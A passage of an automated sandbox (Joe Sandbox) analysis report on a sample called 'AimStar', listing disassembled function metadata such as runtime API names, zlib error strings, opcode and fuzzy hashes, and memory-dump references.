                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction ID: 49e6d8236ff3031130ea1b969ef1b6e06bcf4b4d248ff8fe0acab26016519b7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D1E22AA0CA0245EB20FF21D4461B9B769EF94BA4FC48136EA0D57796DF3CF449C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction ID: a269d102a8c2c3bed4aff0a0944e554530cbf553c41f8533f9e97c13446cabfc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3031943661CF8586D760DF25E8412AEB3A8FB88768F940135EA8D43B55EF3CE159CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction ID: 2790e1605a25fa21914b2ccafce8629b9dd7c71b1face50b81754119035eabb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FB1D72AB1CE9641EA60AB6194121BDE3A8FB85BF4F884131DE5D47BC5EE3CF449C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F1A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F2B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F3C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6564C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                                          • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction ID: 72e60c5750dc642b1ba22b15bc68d6b8610a89e6cc0c9bc41c7db94711dd431d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90514026A0CA4286E710FF21D5875A9B768FB487A4FC48136EA4D537A6DF3CF448C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction ID: f0317e65e8596aa9e8f84eb3ef76c3de50361feac90b3b1882d1941425c9f424
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F112136B18F0589EB00DF60E8552B973A8F759768F440E31EA5D467A4DF7CE198C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                                                                                                          • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                          • Instruction ID: dc67f206cc05402b724b27615cdbc75b1a879a8bd2d9153149adcb1e9895a8bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C1F276B1CA8A87EB249F19A04566AF7A5F794B94F808134DB4E43784DF3DF808CB00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                          • API String ID: 0-1127688429
                                                                                                                                                                                                                                          • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                          • Instruction ID: 6676d5f4a399ba833241891af1c0d7d64021a88fbd01c7d5b881b97d92cf5030
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F19472A0CBD58BE7A5AF188089F3ABAADEF44750F464538DE4987390CB38F548C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                                                                                          • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                          • Instruction ID: e12851ec7c1d1530f72f4233b6f16a0becba783f46b177c27c08e7a32ddfaa11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B1B07BA08B898BEB15CF29C4423AC77E8F740B58F548825DB5D837A4CB39E455C710
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                                                                                                                          • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                          • Instruction ID: 8c39777023823ca9419816b1081d39cc827309a0b2ff6e02b84bcddc4a7927b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDE1E736A0CE4682DB68AE1D805613DB3B8FF45B68F948135DA4E07794DF29FA49C710
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                          • API String ID: 0-900081337
                                                                                                                                                                                                                                          • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                          • Instruction ID: 7613b70169dde800c8bb510787b97f2c6bf2270e0e06bdaa157820a2a1630d05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9919472A1CACA87E7A49E14C489F3E7AADFB44360F514139DE4A86791DB3CF548CB10
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                                                                                                                          • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                          • Instruction ID: 00f8a87351ef7499b621cbb3f7d5662dd1ba9ebe2961d10cc479cb15a9d36027
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F515B62B1CAC186E7289E359802769EBA5E744BA4F88C231CB9C47BC5CF7DF149C710
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                                                                                                          • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                          • Instruction ID: 1538f4de2676d7316bac5f75922eab386327a1096978365edd2bbec27ad725c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7902C129A1DF5640FA65BB1194032BAE6BCAF45BB0FE58635ED5D463D2DE3CB408C320
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                                                                                                                          • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                          • Instruction ID: c05d7be0b46c234ca51cb88911395d1d2b7afdc46cfae159b93ce2140f2ed2c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79A16763A0DBC646EB31EF25A0017A9BBA9EB607A4F458031DE4D477C1DE3DE60AC311
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: TMP
                                                                                                                                                                                                                                          • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                          • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                          • Instruction ID: 92febcf82ac9465cdfc2e7fff7d445a3342fc1a53c60c73026cb998f90a1ac37
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD519415B0CB4641FA64BA26590317AE2A8AF85BE4FC84035DD0E57796EE3CF61EC221
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                          • Instruction ID: 3565c238030b60d11c37d704d9956a40c85341e6c94e63730fdb79a175d75d6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34B09224E0BE06C2EA093B21AC8321862A8BF48720FD84139C00C50330DE2C30E99720
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
